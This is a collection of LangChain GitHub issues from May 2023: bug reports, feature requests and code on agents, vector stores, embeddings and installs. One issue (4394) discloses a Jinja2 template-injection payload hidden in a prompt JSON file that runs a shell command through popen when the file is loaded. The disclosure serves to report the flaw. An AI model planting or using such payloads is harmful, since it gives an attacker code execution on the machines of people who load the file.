### System Info LangChain version : 0.0.158 Python version: 11 Mac OS Ventura 13.2.1 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I am using an agent to integrate with the "serpapi" tool. But, I also need to partially initialize a prompt to inform OpenAI on how to use the serpapi tool. For example, I want to set up the prompt with the current_date, before OpenAPI starts interacting with serp_api. To solve this problem, I am trying to use `llm_chain` as the parameter instead of an `llm` instance. But, currently the `initialize_agent` function only accepts an instance of `llm` and not the `llm_agent` tool. ``` def run_search_chain_serpapi(user_input, current_date=None): if not current_date: current_date = f"{datetime.datetime.now():%Y-%m-%d}" llm = OpenAI(temperature=0) prompt = PromptTemplate( input_variables=["input", "current_date"], template=_DEFAULT_SEARCH_PROMPT ) partial_prompt = prompt.partial(current_date="2023-05-09") llm_chain = LLMChain(llm=llm, prompt=partial_prompt) tools = load_tools([setup_serpi_tool()]) agent = initialize_agent(tools, llm_chain, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, verbose=True) # Now let's test it out! result = agent(user_input) return result ``` I get the following error, while running this function: ``` ValidationError: 1 validation error for LLMChain llm Can't instantiate abstract class BaseLanguageModel with abstract methods agenerate_prompt, generate_prompt (type=type_error) ``` ### Expected behavior I believe given the LangChain is composable, the `agent` should be able to also accept an instance of `llm_chain` and not just plain `llm` instances.
Unable to provide llm_chain (instead of llm) to initialize_agent() while initializing the agent
https://api.github.com/repos/langchain-ai/langchain/issues/4437/comments
6
2023-05-10T04:32:01Z
2023-10-09T16:07:58Z
https://github.com/langchain-ai/langchain/issues/4437
1,703,106,397
4,437
[ "langchain-ai", "langchain" ]
### Feature request HuggingFace has a nice API for serving local LLMs in their [`text-generation`](https://github.com/huggingface/text-generation-inference) repo. I'd like to have a wrapper for this implemented in `langchain.llms`. **Resolves Issues** * [Feature Request Issue 4433](https://github.com/hwchase17/langchain/issues/4433) * [Feature Request Issue 4280](https://github.com/hwchase17/langchain/issues/4280) Usage would basically be something like: ```python # Both of these examples assume you already have a local LLM server # running. See the HuggingFace text-generation documentation for more # information on how to do this. from langchain.llms import HuggingFaceTextgen prompt = "What is Deep Learning?" host = "localhost" port = 8080 # Basic example (no streaming) llm = HuggingFaceTextgen(host=host, port=port) print(llm(prompt)) # Streaming response example from langchain.callbacks import streaming_stdout callbacks = [streaming_stdout.StreamingStdOutCallbackHandler()] llm = HuggingFaceTextgen( host=host, port=port, callbacks=callbacks, stream=True ) print(llm(prompt)) ``` ### Motivation There are a few existing HF LLM wrappers in langchain, but they seem to be more focused towards HF Hub use-cases. One of the biggest things the existing implementations lack (at least so far as I can tell), is they don't support streaming tokens back, which helps reduce _perceived latency_ for the user. ### Your contribution [Pull Request 4434](https://github.com/hwchase17/langchain/pull/4434) [See also PR 4447](https://github.com/hwchase17/langchain/pull/4447) - coincidentally implemented same feature at the same time - either one of these PRs should close the associated issues
Add LLM wrapper for HuggingFace text-generation local inference server
https://api.github.com/repos/langchain-ai/langchain/issues/4433/comments
1
2023-05-10T02:40:16Z
2023-05-13T16:12:28Z
https://github.com/langchain-ai/langchain/issues/4433
1,703,020,333
4,433
[ "langchain-ai", "langchain" ]
### Feature request The current version of CharacterTextSplitter does not provide support for a regular expression in the separator argument. ### Motivation Many documents can be split by slightly different patterns that can be handled by regular expression ### Your contribution -
Add support for regular expression in CharacterTextSplitter
https://api.github.com/repos/langchain-ai/langchain/issues/4429/comments
7
2023-05-10T00:08:27Z
2023-12-25T16:10:45Z
https://github.com/langchain-ai/langchain/issues/4429
1,702,904,262
4,429
[ "langchain-ai", "langchain" ]
### Feature request I like to add more metadata, such as keywords, highlights, questions to be answered together when building an embedding for a document, other than only page_content, I wonder how can it be achieved today? ### Motivation allow to annotate source document to better embedding. but without changing the document. ### Your contribution n/a
I wonder for embedding, we can allow passing other than page_content for embedding service
https://api.github.com/repos/langchain-ai/langchain/issues/4425/comments
4
2023-05-09T22:53:11Z
2023-09-15T16:14:18Z
https://github.com/langchain-ai/langchain/issues/4425
1,702,855,007
4,425
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I want to do Q/A with csv agent and multiple txt files at the same time. But I do not want to use csv loader and txt loader because they did not perform very well when handling cross file scenario. For example, the model needs to find answers from both the csv and txt file and then return the result. How should I do it? I think I may need to create a custom agent. ### Suggestion: _No response_
Do Q/A with csv agent and multiple txt files at the same time.
https://api.github.com/repos/langchain-ai/langchain/issues/4423/comments
7
2023-05-09T22:33:44Z
2023-05-26T17:54:10Z
https://github.com/langchain-ai/langchain/issues/4423
1,702,839,837
4,423
[ "langchain-ai", "langchain" ]
### System Info Appears in LangChain 0.0.150 ### Who can help? @eyurtsev @vowelparrot ### Information - [x] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Documents extraccion (loading) from Confluence pages in version up to 0.0.149 would return Markdown pages. In our app we then use MarkdownTextSplitter to split and embedd. Starting with version 0.0.150, this behavior changed (Confluence beautifulsoup by @vowelparrot in #3576) and the documents extracted have lost their formatting. Formatting (especially combined with MarkdownTextSplitter ) helped the model in understanding the context (text structure, tables,...) and thus give better answer. ### Expected behavior Return Markdown pages as before, or alternatively provide a way to retrieve the documents either as Markdown (like up to version 0.0.149), or stripped (BeautifoulSoup'ed). (Markdown could be kept as an option, but it'd be nice not to remove it as I believe it helps the model (text structure, tables,...).
Regression: ConfluenceDataloader strips away Markdown formatting
https://api.github.com/repos/langchain-ai/langchain/issues/4407/comments
1
2023-05-09T15:34:06Z
2023-08-29T06:29:37Z
https://github.com/langchain-ai/langchain/issues/4407
1,702,282,488
4,407
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I have this code running smoothly before, llm=HuggingFaceHub(repo_id="google/flan-t5-xxl", model_kwargs={"temperature":0.7, "max_length":512}). Bu today, it says "HfHubHTTPError: 404 Client Error: Not Found for url: https://huggingface.co/api/models/google/flan-t5-xxl (Request ID: Root=1-645a5b93-4a130f591edbbc965dc50e6b) Sorry, we can't find the page you are looking for.". Any idea? ### Suggestion: _No response_
Issue: <Model google/flan-t5-xxl does not exist>
https://api.github.com/repos/langchain-ai/langchain/issues/4404/comments
2
2023-05-09T14:53:57Z
2023-09-10T16:19:43Z
https://github.com/langchain-ai/langchain/issues/4404
1,702,210,282
4,404
[ "langchain-ai", "langchain" ]
In databricks I cant able to import langchain. `TypeError: dataclass_transform() got an unexpected keyword argument 'field_specifiers'` <img width="1266" alt="Capture d’écran 2023-05-09 à 16 18 05" src="https://github.com/hwchase17/langchain/assets/22887323/dad2700a-ad90-4d36-bb25-c5c00e6eb42f"> Thanks in advance.
ERROR-Import Langchain : TypeError: dataclass_transform() got an unexpected keyword argument 'field_specifiers'
https://api.github.com/repos/langchain-ai/langchain/issues/4401/comments
26
2023-05-09T14:25:59Z
2023-11-14T16:08:49Z
https://github.com/langchain-ai/langchain/issues/4401
1,702,155,760
4,401
[ "langchain-ai", "langchain" ]
### Feature request Currently, Weaviate vectorstore doesn't provide option for updation of vector embeddings on existing index and deletion of index. ### Motivation This feature request is related to an experiment project for which we need CRUD operations on Weaviate vectorstore. ### Your contribution I can provide my contribution if no one is currently working on this request.
[Feature Request] update and delete index operation on Weaviate vectorstore
https://api.github.com/repos/langchain-ai/langchain/issues/4399/comments
3
2023-05-09T14:10:15Z
2023-09-19T16:11:32Z
https://github.com/langchain-ai/langchain/issues/4399
1,702,126,607
4,399
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Hey, we are trying to make use of a pandas dataframe agent. Most querys are working quite good but we cant get it working with time span querys. If we ask the agent "what date is it?" the answer is correct. But if we ask give me the revenue of the last week...the pandas query it generates is syntactically correct but the dates are completely off... Has anyone idea how to fix this? Thanks! ### Suggestion: _No response_
Agent not getting time spans correctly..
https://api.github.com/repos/langchain-ai/langchain/issues/4397/comments
3
2023-05-09T13:34:39Z
2023-09-15T16:14:28Z
https://github.com/langchain-ai/langchain/issues/4397
1,702,053,499
4,397
[ "langchain-ai", "langchain" ]
### System Info Hi, can't update langchain. any insight ? ``` Building wheels for collected packages: jq Building wheel for jq (pyproject.toml) ... error error: subprocess-exited-with-error × Building wheel for jq (pyproject.toml) did not run successfully. │ exit code: 1 ╰─> [5 lines of output] running bdist_wheel running build running build_ext Executing: ./configure CFLAGS=-fPIC --prefix=C:\Users\mysuser\AppData\Local\Temp\pip-install-7643mu3e\jq_64b3898552df463e990cf884cae8a414\_deps\build\onig-install-6.9.4 error: [WinError 2] The system cannot find the file specified [end of output] note: This error originates from a subprocess, and is likely not a problem with pip. ERROR: Failed building wheel for jq Failed to build jq ERROR: Could not build wheels for jq, which is required to install pyproject.toml-based projects ``` ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction pip install langchain[all] --upgrade ### Expected behavior no issue during installtion
Building wheels for collected package: jq failed in Windows
https://api.github.com/repos/langchain-ai/langchain/issues/4396/comments
27
2023-05-09T12:58:59Z
2024-06-12T05:00:12Z
https://github.com/langchain-ai/langchain/issues/4396
1,701,984,751
4,396
[ "langchain-ai", "langchain" ]
### System Info Weaviate vectorstore not getting initialized with Azure OpenAI embeddings. Code: ``` from langchain.embeddings import OpenAIEmbeddings from langchain.vectorstores import Weaviate from langchain.embeddings.base import Embeddings auth_config = weaviate.auth.AuthApiKey(api_key=WEAVIATE_API) client = weaviate.Client(url=WEAVIATE_HOST, auth_client_secret=auth_config) embeddings_model: Embeddings = OpenAIEmbeddings(model="text-embedding-ada-002", chunk_size=1) vectorstore = Weaviate(client=client, index_name="chatbot_dev", text_key="content", embedding=embeddings_model) ``` Error: ``` TypeError: Weaviate.__init__() got an unexpected keyword argument 'embedding' ``` Also, tried to initialize with Weaviate.from_texts() ``` from langchain.vectorstores import Weaviate qa = Weaviate.from_texts(texts=['here is a sample'], embedding=embeddings_model, index_name="content", weaviate_url="your Weaviate URL") ``` Error: ``` NotImplementedError: weaviate does not currently support `from_texts` ``` ### Who can help? @ruanwz @vowelparrot ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` from langchain.embeddings import OpenAIEmbeddings from langchain.vectorstores import Weaviate from langchain.embeddings.base import Embeddings auth_config = weaviate.auth.AuthApiKey(api_key=WEAVIATE_API) client = weaviate.Client(url=WEAVIATE_HOST, auth_client_secret=auth_config) embeddings_model: Embeddings = OpenAIEmbeddings(model="text-embedding-ada-002", chunk_size=1) vectorstore = Weaviate(client=client, index_name="chatbot_dev", text_key="content", embedding=embeddings_model) ``` ### Expected behavior Weaviate vector store library should be generic to support multiple use cases.
Weaviate Vectorstore not initialized with Azure OpenAI embeddings
https://api.github.com/repos/langchain-ai/langchain/issues/4395/comments
5
2023-05-09T12:57:24Z
2023-12-28T12:21:38Z
https://github.com/langchain-ai/langchain/issues/4395
1,701,981,229
4,395
[ "langchain-ai", "langchain" ]
### System Info windows 11 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. save the following data to pt.json ```json { "input_variables": [ "prompt" ], "output_parser": null, "partial_variables": {}, "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}", "template_format": "jinja2", "validate_template": true, "_type": "prompt" } ``` 2. run ```python from langchain.prompts import load_prompt loaded_prompt = load_prompt("pt.json") loaded_prompt.format(history="", prompt="What is 1 + 1?") ``` 3. the `dir` command will be execute attack scene: Alice can send prompt file to Bob and let Bob to load it. analysis: Jinja2 is used to concat prompts. Template injection will happened note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment. ### Expected behavior code should not be execute
Template injection to arbitrary code execution
https://api.github.com/repos/langchain-ai/langchain/issues/4394/comments
4
2023-05-09T12:28:24Z
2023-10-10T15:15:44Z
https://github.com/langchain-ai/langchain/issues/4394
1,701,910,416
4,394
[ "langchain-ai", "langchain" ]
### System Info **Version Information** **Platform** : Windows 10 **LangChain** - 0.0.149 **Python** - 3.8.9 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction The step-by-step process from given [link](https://python.langchain.com/en/latest/modules/models/llms/integrations/writer.html) ![image](https://user-images.githubusercontent.com/23481244/237052818-5f14f21a-727f-4e39-8b5b-845ec6f8e286.png) To reproduce the SSLError ![image](https://user-images.githubusercontent.com/23481244/237051889-0cf0d7c1-9e8c-43d0-8c68-f716c8b6281e.png) https://python.langchain.com/en/latest/modules/models/llms/integrations/writer.html ### Expected behavior Run the code with errors and warnings with Writer LLM
SSLError: HTTPSConnectionPool(host='api.llm.writer.com', port=443): Max retries exceeded
https://api.github.com/repos/langchain-ai/langchain/issues/4391/comments
1
2023-05-09T09:19:32Z
2023-09-10T16:19:57Z
https://github.com/langchain-ai/langchain/issues/4391
1,701,688,968
4,391
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. ConversationalChatAgent places `FORMAT_INSTRUCTIONS` as well as tools section within human message, not within system message. This is fine as long as ChatGPT-3.5 is being used where LLM gives more weightage to human message than system message. But, that is not the case for ChatGPT-4 where System message has higher weightage than human message. In fact, with ChatGPT-4, when `FORMAT_INSTRUCTIONS` is embedded within the human message, the output generated not always follow the format. However, the vice versa is not true. <s>IMHO, the [JSONDecodeError] (https://github.com/hwchase17/langchain/issues/3455) may vanish for ChatGPT-4 if we place the format instruction inside the System message.</s> ### Suggestion: I have been able to modify the implementation inside `langchain.agents.conversational_chat` (below), but I guess it would be better if we change the langchain API as well. On top of my change, I had to use the changes from this [PR](https://github.com/hwchase17/langchain/pull/3480) to handle the cases, when GPT4 is not responding with the json format. ``` from typing import Sequence, Optional, List, Any from pydantic import Field from langchain.tools.base import BaseTool from langchain.agents import ConversationalChatAgent from langchain.schema import ( BaseOutputParser, ) from langchain.prompts.base import BasePromptTemplate from langchain.prompts.chat import ( ChatPromptTemplate, HumanMessagePromptTemplate, MessagesPlaceholder, SystemMessagePromptTemplate, ) from langchain.agents.agent import Agent, AgentOutputParser class GPT4ConversationalChatAgent(ConversationalChatAgent): @classmethod def create_prompt( cls, tools: Sequence[BaseTool], system_message: str = PREFIX, human_message: str = SUFFIX, input_variables: Optional[List[str]] = None, output_parser: Optional[BaseOutputParser] = None, ) -> BasePromptTemplate: tool_strings = "\n".join( [f"> {tool.name}: {tool.description}" for tool in tools] ) tool_names = ", ".join([tool.name for tool in tools]) _output_parser = output_parser or cls._get_default_output_parser() format_instructions = system_message.format( format_instructions=_output_parser.get_format_instructions() ) final_system_prompt = format_instructions.format( tool_names=tool_names, tools=tool_strings ) if input_variables is None: input_variables = ["input", "chat_history", "agent_scratchpad"] messages = [ SystemMessagePromptTemplate.from_template(final_system_prompt), MessagesPlaceholder(variable_name="chat_history"), HumanMessagePromptTemplate.from_template(human_message), MessagesPlaceholder(variable_name="agent_scratchpad"), ] return ChatPromptTemplate(input_variables=input_variables, messages=messages) memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True) agent = GPT4ConversationalChatAgent.from_llm_and_tools( llm=llm, tools=tools, system_message=PREFIX, human_message=SUFFIX, ) agent_chain = AgentExecutor.from_agent_and_tools(agent=agent, tools=tools, verbose=True, memory=memory) ```
Option for ConversationalChatAgent to place format instruction and tools within System Message for ChatGPT 4.0
https://api.github.com/repos/langchain-ai/langchain/issues/4385/comments
2
2023-05-09T07:32:07Z
2023-09-19T16:11:37Z
https://github.com/langchain-ai/langchain/issues/4385
1,701,519,474
4,385
[ "langchain-ai", "langchain" ]
### System Info chain = load_summarize_chain(llm, chain_type="refine", verbose=True) when llm use AzureOpenAI, it will fail to send request, and will get this error File "C:\Users\\.conda\envs\captionSummary\lib\site-packages\openai\api_requestor.py", line 230, in request resp, got_stream = self._interpret_response(result, stream) File "C:\Users\\.conda\envs\captionSummary\lib\site-packages\openai\api_requestor.py", line 624, in _interpret_response self._interpret_response_line( File "C:\Users\\.conda\envs\captionSummary\lib\site-packages\openai\api_requestor.py", line 687, in _interpret_response_line raise self.handle_error_response( openai.error.InvalidRequestError: Resource not found ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction chain = load_summarize_chain(llm, chain_type="refine", verbose=True) when llm use AzureOpenAI, it will fail to send request, and will get this error ### Expected behavior Work well with the azure API call.
Could not use load_summarize_chain with Azure API.
https://api.github.com/repos/langchain-ai/langchain/issues/4384/comments
6
2023-05-09T05:54:19Z
2024-07-15T14:19:28Z
https://github.com/langchain-ai/langchain/issues/4384
1,701,388,720
4,384
[ "langchain-ai", "langchain" ]
### System Info langchain 0.0.162 python 3.8 HuggingFace free tier server ### Who can help? _No response_ ### Information - [x] The official example notebooks/scripts - [x] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` from langchain.embeddings import HuggingFaceEmbeddings embeddings = HuggingFaceEmbeddings() ``` ``` /user/.local/lib/python3.8/site-packages/huggingface_hub/utils/_errors.py", line 259, in hf_raise_for_status response.raise_for_status() File "/home/user/.local/lib/python3.8/site-packages/requests/models.py", line 1021, in raise_for_status raise HTTPError(http_error_msg, response=self) requests.exceptions.HTTPError: 401 Client Error: Unauthorized for url: https://huggingface.co/api/models/sentence-transformers/all-mpnet-base-v2 The above exception was the direct cause of the following exception: Traceback (most recent call last): File "app.py", line 2, in <module> embeddings = HuggingFaceEmbeddings() File "/home/user/.local/lib/python3.8/site-packages/langchain/embeddings/huggingface.py", line 54, in __init__ self.client = sentence_transformers.SentenceTransformer( File "/home/user/.local/lib/python3.8/site-packages/sentence_transformers/SentenceTransformer.py", line 87, in __init__ snapshot_download(model_name_or_path, File "/home/user/.local/lib/python3.8/site-packages/sentence_transformers/util.py", line 442, in snapshot_download model_info = _api.model_info(repo_id=repo_id, revision=revision, token=token) File "/home/user/.local/lib/python3.8/site-packages/huggingface_hub/utils/_validators.py", line 120, in _inner_fn return fn(*args, **kwargs) File "/home/user/.local/lib/python3.8/site-packages/huggingface_hub/hf_api.py", line 1604, in model_info hf_raise_for_status(r) File "/home/user/.local/lib/python3.8/site-packages/huggingface_hub/utils/_errors.py", line 291, in hf_raise_for_status raise RepositoryNotFoundError(message, response) from e huggingface_hub.utils._errors.RepositoryNotFoundError: 401 Client Error. (Request ID: Root=1-6459cb14-023db7f06244e0660677dfb9) ``` ### Expected behavior Successfully creates an embeddings model.
https://huggingface.co/api/models/sentence-transformers/all-mpnet-base-v2 not found? HTTP 401
https://api.github.com/repos/langchain-ai/langchain/issues/4379/comments
9
2023-05-09T04:46:22Z
2023-05-09T18:47:14Z
https://github.com/langchain-ai/langchain/issues/4379
1,701,318,779
4,379
[ "langchain-ai", "langchain" ]
### Feature request I propose refactoring the TimeWeightedVectorStore to use epoch milliseconds as the time format instead of directly passing in a python `datetime` object as the `created_at` and `last_accessed_at` fields. The current implementation _does_ allow users to specify a current_time when adding documents, but on retrieval it always uses datetime.now() to rescore docs. Adding: ```py def add_documents(self, documents: List[Document], **kwargs: Any) -> List[str]: """Add documents to vectorstore.""" current_time = kwargs.get("current_time", datetime.now()) # Avoid mutating input documents dup_docs = [deepcopy(d) for d in documents] for i, doc in enumerate(dup_docs): if "last_accessed_at" not in doc.metadata: doc.metadata["last_accessed_at"] = current_time if "created_at" not in doc.metadata: doc.metadata["created_at"] = current_time doc.metadata["buffer_idx"] = len(self.memory_stream) + i self.memory_stream.extend(dup_docs) return self.vectorstore.add_documents(dup_docs, **kwargs) ``` Retrieval: ```py def get_relevant_documents(self, query: str) -> List[Document]: """Return documents that are relevant to the query.""" current_time = datetime.now() docs_and_scores = { doc.metadata["buffer_idx"]: (doc, self.default_salience) for doc in self.memory_stream[-self.k :] } # If a doc is considered salient, update the salience score docs_and_scores.update(self.get_salient_docs(query)) rescored_docs = [ (doc, self._get_combined_score(doc, relevance, current_time)) for doc, relevance in docs_and_scores.values() ] rescored_docs.sort(key=lambda x: x[1], reverse=True) result = [] # Ensure frequently accessed memories aren't forgotten current_time = datetime.now() for doc, _ in rescored_docs[: self.k]: # TODO: Update vector store doc once `update` method is exposed. buffered_doc = self.memory_stream[doc.metadata["buffer_idx"]] buffered_doc.metadata["last_accessed_at"] = current_time result.append(buffered_doc) return result ``` What's the problem with this? `datetime.now()` is not JSON (de-)serializable. ### Motivation While this class works fine in the example using a local FAISS vectorstore, it requires you to define custom JSONEncoder and Decoders if you want to persist to/instantiate from local. It also doesn't work with the Redis Vectorstore because that serializes to JSON before storing the docs. ### Your contribution There are a couple options to fix this, the least invasive of which is: - use epoch ms as the fixed format for storing time values b/c it's nice for serDe - convert the times into python datetime objects in the `_get_hours_passed` function This function is the only place where the timestamps _need_ to be python datetime objects. The alternative fixes involve expanding the API surface area of any vectorstore where JSON encoders and decoders are needed to solve this problem. No one likes prop drilling.
(De)Serializing memories in TimeWeightedVectorStore
https://api.github.com/repos/langchain-ai/langchain/issues/4377/comments
2
2023-05-09T02:40:31Z
2024-06-26T06:05:36Z
https://github.com/langchain-ai/langchain/issues/4377
1,701,213,657
4,377
[ "langchain-ai", "langchain" ]
### System Info LangChain version: 0.0.162 Python version: 3.8.10 ### Who can help? @hwchase17 ### Information - [ ] The official example notebooks/scripts - [x] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [X] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ```python import os from langchain.chat_models import ChatOpenAI from langchain.agents import load_tools, initialize_agent, AgentType from langchain.memory import ConversationBufferMemory os.environ["OPENAI_API_KEY"] = "" llm = ChatOpenAI( temperature = 0.9, max_tokens = 1024, model_name = 'gpt-4' ) def create_memory(): memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True) memory.clear() return memory tools = load_tools( ["human"], llm=llm ) agent = initialize_agent( tools, llm, agent=AgentType.CHAT_CONVERSATIONAL_REACT_DESCRIPTION, memory=create_memory(), verbose=True ) agent.run('Write a python program to run a simple HTTP server') ``` ### Expected behavior Agent is able to correctly parse the response from OpenAI.
ConvoOutputParser fails to parse a valid output which contains a code block
https://api.github.com/repos/langchain-ai/langchain/issues/4371/comments
3
2023-05-09T01:22:18Z
2023-11-14T16:08:54Z
https://github.com/langchain-ai/langchain/issues/4371
1,701,154,334
4,371
[ "langchain-ai", "langchain" ]
### Feature request Redis vectorstore allows for three different distance metrics: `L2` (flat L2), `COSINE`, and `IP` (inner product). Currently, the `Redis._create_index` method hard codes the distance metric to COSINE. ```py def _create_index(self, dim: int = 1536) -> None: try: from redis.commands.search.field import TextField, VectorField from redis.commands.search.indexDefinition import IndexDefinition, IndexType except ImportError: raise ValueError( "Could not import redis python package. " "Please install it with `pip install redis`." ) # Check if index exists if not _check_index_exists(self.client, self.index_name): # Constants distance_metric = ( "COSINE" # distance metric for the vectors (ex. COSINE, IP, L2) ) schema = ( TextField(name=self.content_key), TextField(name=self.metadata_key), VectorField( self.vector_key, "FLAT", { "TYPE": "FLOAT32", "DIM": dim, "DISTANCE_METRIC": distance_metric, }, ), ) prefix = _redis_prefix(self.index_name) # Create Redis Index self.client.ft(self.index_name).create_index( fields=schema, definition=IndexDefinition(prefix=[prefix], index_type=IndexType.HASH), ) ``` This should be parameterized. ### Motivation I'd like to be able to use L2 distance metrics. ### Your contribution I've already forked and made a branch that parameterizes the distance metric in `langchain.vectorstores.redis`: ```py def _create_index(self, dim: int = 1536, distance_metric: REDIS_DISTANCE_METRICS = "COSINE") -> None: try: from redis.commands.search.field import TextField, VectorField from redis.commands.search.indexDefinition import IndexDefinition, IndexType except ImportError: raise ValueError( "Could not import redis python package. " "Please install it with `pip install redis`." ) # Check if index exists if not _check_index_exists(self.client, self.index_name): # Define schema schema = ( TextField(name=self.content_key), TextField(name=self.metadata_key), VectorField( self.vector_key, "FLAT", { "TYPE": "FLOAT32", "DIM": dim, "DISTANCE_METRIC": distance_metric, }, ), ) prefix = _redis_prefix(self.index_name) # Create Redis Index self.client.ft(self.index_name).create_index( fields=schema, definition=IndexDefinition(prefix=[prefix], index_type=IndexType.HASH), ) def _create_index(self, dim: int = 1536, distance_metric: REDIS_DISTANCE_METRICS = "COSINE") -> None: try: from redis.commands.search.field import TextField, VectorField from redis.commands.search.indexDefinition import IndexDefinition, IndexType except ImportError: raise ValueError( "Could not import redis python package. " "Please install it with `pip install redis`." ) # Check if index exists if not _check_index_exists(self.client, self.index_name): # Define schema schema = ( TextField(name=self.content_key), TextField(name=self.metadata_key), VectorField( self.vector_key, "FLAT", { "TYPE": "FLOAT32", "DIM": dim, "DISTANCE_METRIC": distance_metric, }, ), ) prefix = _redis_prefix(self.index_name) # Create Redis Index self.client.ft(self.index_name).create_index( fields=schema, definition=IndexDefinition(prefix=[prefix], index_type=IndexType.HASH), ) ... @classmethod def from_texts( cls: Type[Redis], texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, index_name: Optional[str] = None, content_key: str = "content", metadata_key: str = "metadata", vector_key: str = "content_vector", distance_metric: REDIS_DISTANCE_METRICS = "COSINE", **kwargs: Any, ) -> Redis: """Create a Redis vectorstore from raw documents. This is a user-friendly interface that: 1. Embeds documents. 2. Creates a new index for the embeddings in Redis. 3. Adds the documents to the newly created Redis index. This is intended to be a quick way to get started. Example: .. code-block:: python from langchain.vectorstores import Redis from langchain.embeddings import OpenAIEmbeddings embeddings = OpenAIEmbeddings() redisearch = RediSearch.from_texts( texts, embeddings, redis_url="redis://username:password@localhost:6379" ) """ redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL") if "redis_url" in kwargs: kwargs.pop("redis_url") # Name of the search index if not given if not index_name: index_name = uuid.uuid4().hex # Create instance instance = cls( redis_url=redis_url, index_name=index_name, embedding_function=embedding.embed_query, content_key=content_key, metadata_key=metadata_key, vector_key=vector_key, **kwargs, ) # Create embeddings over documents embeddings = embedding.embed_documents(texts) # Create the search index instance._create_index(dim=len(embeddings[0]), distance_metric=distance_metric) # Add data to Redis instance.add_texts(texts, metadatas, embeddings) return instance ``` I'll make the PR and link this issue
Add distance metric param to to redis vectorstore index
https://api.github.com/repos/langchain-ai/langchain/issues/4368/comments
0
2023-05-09T00:40:32Z
2023-05-11T07:20:03Z
https://github.com/langchain-ai/langchain/issues/4368
1,701,125,645
4,368
[ "langchain-ai", "langchain" ]
### System Info Consider the following python code snippet below. On the example, the code will provide an error. This is due to the fact that it is not correctly parsing the JSON strings. For some reason, the template will try to look for the variable "Person", when that is just a JSON output form. This means that the classes are confusing what are variables of the template and what are just text within a JSON string on what we are feeding as an example. What is curious is that this does not happen for the PromptTemplate class. So, it must be about the iteration between examples. ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [X] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction python''' from langchain import PromptTemplate from langchain import FewShotPromptTemplate from langchain.prompts.example_selector import 